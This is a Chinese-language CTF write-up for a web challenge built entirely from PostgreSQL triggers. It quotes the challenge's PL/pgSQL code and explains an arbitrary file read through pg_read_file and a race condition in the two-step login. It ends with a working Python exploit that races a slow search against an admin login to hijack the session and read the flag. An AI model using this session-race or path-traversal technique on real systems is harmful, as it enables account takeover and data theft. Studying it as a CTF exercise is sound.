0x1 triggered
这是个代码审计题目,但是有毒的是题目所有的逻辑都是sql语句实现的,其中包括 HTTP 请求包解析,和业务逻辑处理,全是用触发器来依次调用的。为了让大家可以看到这个好玩的题目,我还把这个题目传到了github上,方便大家学习 https://github.com/sysalong/CTF_web
代码基本可以分为两部分,前800行,主要负责http请求的解析,后面800行主要负责业务逻辑,来生成响应。
目录穿越漏洞
在web.request 表上有这样的一个触发器用来处理静态资源
CREATE TRIGGER route_static
BEFORE INSERT
ON web.request
FOR EACH ROW
WHEN (substring(NEW.path, 1, 8) = '/static/')
EXECUTE PROCEDURE web.handle_static();
跟一下 handle_static
的代码如下:
CREATE FUNCTION web.handle_static() RETURNS trigger AS $$
BEGIN
PERFORM web.serve_static(NEW.uid, substring(NEW.path, 9));
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE FUNCTION web.serve_static(uid uuid, path text) RETURNS void AS $$
DECLARE
dot_parts text[];
BEGIN
SELECT
regexp_split_to_array(path, '\.')
INTO dot_parts;
INSERT INTO web.response_header (
request_uid,
key,
value
)
SELECT
uid,
'Content-Type',
mime_type
FROM
web.mime_type
WHERE
extension = dot_parts[array_length(dot_parts, 1)];
INSERT INTO web.response (
request_uid,
status,
status_text,
body
) VALUES (
uid,
200,
'Ok',
pg_read_file('triggered/static/' || path)
);
END;
$$ LANGUAGE plpgsql;
这里直接使用了 pg_read_file('triggered/static/' || path)
, 显然可以任意文件读取。
本地验证:
但是不知道为啥在服务器端却不能成功,一直返回 500,具体原因还不太清楚。
session和cookie的管理
这个题目有个很让人怀疑的地方就是他的登录流程,是分两步的,先输入用户名,生成cookie和session,然后再输入密码,修改session为登录状态,直接看代码就明白了。
CREATE FUNCTION web.handle_post_login() RETURNS TRIGGER AS $$
DECLARE
form_username text;
session_uid uuid;
form_user_uid uuid;
context jsonb;
BEGIN
SELECT
web.get_form(NEW.uid, 'username')
INTO form_username;
SELECT
web.get_cookie(NEW.uid, 'session')::uuid
INTO session_uid; -- 查询出来session id
SELECT
uid
FROM
web.user
WHERE
username = form_username
INTO form_user_uid; -- 查询出来用户id
IF form_user_uid IS NOT NULL
THEN
INSERT INTO web.session (
uid,
user_uid,
logged_in
) VALUES (
COALESCE(session_uid, uuid_generate_v4()),
form_user_uid,
FALSE
)
ON CONFLICT (uid)
DO UPDATE
SET
user_uid = form_user_uid,
logged_in = FALSE
RETURNING uid
INTO session_uid;
PERFORM web.set_cookie(NEW.uid, 'session', session_uid::text);
PERFORM web.respond_with_redirect(NEW.uid, '/login/password');
ELSE
PERFORM web.respond_with_redirect(NEW.uid, '/login');
END IF;
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
---------- GET /login/password
CREATE FUNCTION web.handle_get_login_password() RETURNS TRIGGER AS $$
DECLARE
session_uid uuid;
logged_in boolean;
username text;
context jsonb;
BEGIN
SELECT
web.get_cookie(NEW.uid, 'session')::uuid
INTO session_uid;
IF session_uid IS NULL
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/login');
RETURN NEW;
END IF;
SELECT
session.logged_in,
usr.username
FROM
web.session session
INNER JOIN web.user usr
ON usr.uid = session.user_uid
WHERE
session.uid = session_uid
INTO logged_in, username;
IF logged_in
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/login');
RETURN NEW;
END IF;
SELECT
web.get_base_context(NEW.uid)
|| jsonb_build_object('username', username)
INTO context;
PERFORM web.respond_with_template(NEW.uid, 'login-password.html', context);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE FUNCTION web.handle_post_login_password() RETURNS TRIGGER AS $$
DECLARE
form_password text;
session_uid uuid;
success boolean;
BEGIN
SELECT
web.get_cookie(NEW.uid, 'session')::uuid
INTO session_uid;
IF session_uid IS NULL
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/login');
RETURN NEW;
END IF;
SELECT
web.get_form(NEW.uid, 'password')
INTO form_password;
IF form_password IS NULL
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/login/password');
RETURN NEW;
END IF;
SELECT EXISTS (
SELECT
*
FROM
web.user usr
INNER JOIN web.session session
ON usr.uid = session.user_uid
WHERE
session.uid = session_uid
AND usr.password_hash = crypt(form_password, usr.password_hash)
)
INTO success;
IF success
THEN
UPDATE web.session
SET
logged_in = TRUE
WHERE
uid = session_uid;
PERFORM web.respond_with_redirect(NEW.uid, '/');
ELSE
PERFORM web.respond_with_redirect(NEW.uid, '/login/password');
END IF;
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
总结一下,操作如下:
- 获取用户提交的用户名和存储在cookie表中的 session_uid
- 根据用户名,从 user表中查询出来 form_user_uid
- 然后将 session_uid 和 form_user_uid 和为False的登录状态写入到 session表中,如果session_uid为空(就是用户请求的时候不带session),则为此用户重新生成一个。 如果 session_uid 在数据库中已经存在,就修改这个 session_uid 对应的 user_uid 为当前登录的用户的id,登录状态设置为false 。
- 接下来设置 cookie , 并跳转到
/login/password
- 接下来是 post 到
/login/password
的处理流程,同样是获取session_uid
和用户输入的password , 然后把 user表和session表以user_uid相等为条件做一个连接,以 session_uid 和 password 为条件做一次查询。 - 如果查询到,就更新用户的session为登录状态
下面是验证是否登录的代码如下:
CREATE FUNCTION web.is_logged_in(request_uid uuid) RETURNS boolean AS $$
DECLARE
session_uid uuid;
ret boolean;
BEGIN
SELECT
web.get_cookie(request_uid, 'session')::uuid
INTO session_uid;
IF session_uid IS NULL
THEN
RETURN FALSE;
END IF;
SELECT
logged_in
FROM
web.session
WHERE
uid = session_uid
INTO
ret;
RETURN COALESCE(ret, FALSE);
END;
$$ LANGUAGE plpgsql;
这个过程存在一个竞争条件,如果用户A使用session_A并处于登录状态,此时用户B也使用session_A进行登录(仅输入用户名),这时用户B就可以修改数据库中存储的session_A对应的user_id,并将A设置为未登录状态。 如果此时恰好A用户在执行某个耗时的操作,并且已经执行过is_logged_in
函数的校验,那么接下来A用户的所有操作都是B用户的身份执行的。
竞争条件的利用
因为这个竞争发生在is_logged_in
函数执行之后,一次操作完成之前,所以时间窗口还是比较小的,所以要找一个相对来说比较耗时的操作。题目中有个搜索操作,代码如下:
CREATE FUNCTION web.handle_post_search() RETURNS TRIGGER AS $$
DECLARE
user_uid uuid;
session_uid uuid;
query_string text;
query tsquery;
context jsonb;
BEGIN
IF NOT web.is_logged_in(NEW.uid)
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/login');
RETURN NEW;
END IF;
SELECT
web.get_form(NEW.uid, 'query')
INTO query_string;
IF query_string IS NULL OR trim(query_string) = ''
THEN
PERFORM web.respond_with_redirect(NEW.uid, '/search');
RETURN NEW;
END IF;
BEGIN
SELECT
web.query_to_tsquery(query_string)
INTO query;
EXCEPTION WHEN OTHERS THEN
PERFORM web.respond_with_redirect(NEW.uid, '/search');
RETURN NEW;
END;
SELECT
web.get_cookie(NEW.uid, 'session')::uuid
INTO session_uid;
SELECT
session.user_uid
FROM
web.session session
WHERE
session.uid = session_uid
INTO user_uid;
SELECT
web.get_base_context(NEW.uid)
INTO context;
WITH notes AS (
SELECT
jsonb_build_object(
'author', usr.username,
'title', note.title,
'content', note.content,
'date', to_char(note.date, 'HH:MIam on Month DD, YYYY')
) AS obj
FROM
web.note note
INNER JOIN web.user usr
ON note.author_uid = usr.uid
WHERE
usr.uid = user_uid
AND note.search @@ query
)
SELECT
context
|| jsonb_build_object(
'search', query_string,
'results', COALESCE(jsonb_agg(notes.obj), '[]'::jsonb)
)
FROM
notes
INTO context;
PERFORM web.respond_with_template(NEW.uid, 'search.html', context);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
按照刚才的分析,我们只需要发送一个很长的 query_string,使得web.query_to_tsquery(query_string)
的执行时间很长,在这个函数执行期间,在用admin身份带上我们用户的session去请求登录,就可以修改掉我们用户的 user_id,接下里的操作就是以管理员身份执行的了:
SELECT
session.user_uid
FROM
web.session session
WHERE
session.uid = session_uid
INTO user_uid;
SELECT
web.get_base_context(NEW.uid)
INTO context;
WITH notes AS (
SELECT
jsonb_build_object(
'author', usr.username,
'title', note.title,
'content', note.content,
'date', to_char(note.date, 'HH:MIam on Month DD, YYYY')
) AS obj
FROM
web.note note
INNER JOIN web.user usr
ON note.author_uid = usr.uid
WHERE
usr.uid = user_uid
AND note.search @@ query
)
构造适当的查询语句,就可以查出flag。
最后的exp如下:
#!/usr/bin/python
import requests
import threading
import time
s = requests.session()
def login(username):
url = "http://triggered.pwni.ng:52856/login"
data = {"username":username}
res = s.post(url,data=data)
print("[*] login with username")
# print(res.text)
def login_password(password):
url = "http://triggered.pwni.ng:52856/login/password"
data = {"password":password}
res = s.post(url,data=data)
print("[*] login with password")
# print(res.text)
def query(condition):
url = "http://triggered.pwni.ng:52856/search"
data = {"query":condition}
while True:
res = s.post(url,data=data)
print("[*] query a note ...")
if "no result" not in res.text:
print(res.text)
break
elif res.status_code != 200 :
break
if __name__ == '__main__':
login("test")
login_password("123")
t1 = threading.Thread(target=query,args=(" \"PCTF\" or "*10+ " \"PCTF\" " ,))
t1.start()
# time.sleep(3)
t2 = threading.Thread(target=login,args=("admin",))
t2.start()
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏